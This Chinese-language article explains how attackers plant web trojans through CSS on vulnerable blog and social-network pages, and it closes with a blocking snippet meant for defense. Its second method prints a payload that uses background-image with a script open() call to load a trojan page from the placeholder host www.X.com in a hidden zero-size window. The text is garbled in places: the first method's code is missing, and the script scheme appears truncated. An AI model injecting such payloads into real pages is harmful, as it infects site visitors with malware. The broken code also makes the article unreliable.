随着Web2.0技术以及Blog、Wiki等广泛的普及，各种网页、模板的特效用得也越来越多，在大家纷纷将网页从最初的table转向 div+css时，这也给黑客一个可乘之机。近来有人发现，用来制作网页特效的CSS代码，也可以用来挂马。而比较讽刺的是，CSS挂马方式其实是从防范 E挂马的CSS代码演变而来。

目前，CSS挂马方式比较多，但主流的方式是通过有漏洞的博客或者SNS社交网站系统，将恶意的CSS代码写入支持CSS功能的个性化页面中。下面 我们以典型的CSS挂马方式为例进行讲解。

方式1：

Body

“background-image”在CSS中的主要功能是用来定义页面的背景图片。

这是最典型的CSS挂马方式。使用Body对象元素，主要是为了让对象不再改变整个网页文档的内容，通过Body对象的控制，可以将内容或者效果控 制在指定的大小内，如同使用DIV对象那样精确地设置大小。而这段恶意代码主要是通过“background-image”配合t代码让网页木马悄悄地在 用户的电脑中运行。

那如何将这段CSS恶意代码挂到正常的网页中去呢？黑客可以将生成好的网页木马放到自己指定的位置，然后将该段恶意代码写入挂马网站的网页中，或者 挂马网页所调用的CSS文件中。

方式2：

Body

background-image：url（t：open（”http：//www.X.com /muma.htm”，”newwindow”，”border=”1″ Height=0，Width=0，top=1000，center=0，toolbar=no，menubar=no，scrollbars=no，resizable=no，location=no，status=no”））

如果说，方式1的CSS挂马技术，在运行时会出现空白的页面，影响网页访问者正常的访问，因此比较容易发现，那么，在方式2中的这段代码，使用了t 的Open开窗，通过新开一个隐藏的窗口，在后台悄悄地运行新窗口并激活访问网页溢出木马页面，不会影响访问者观看网页内容，因此更加隐蔽。

不过，有功有防。上述方法都是靠弹窗打开有木马的页面，而目前除了使用以前的阻断弹出窗口防范CSS挂马之外，还可以在网页中设置CSS过滤，将 CSS过滤掉。不过如果你选择过滤CSS的话，首先需要留意自己的相关网页是否有CSS的内容，因此我们仍然首推用阻断方式来防范CSS.阻断代码如下所 示：

emiao1：expression（this.src=”about：blank”，this.outerHTML=” “）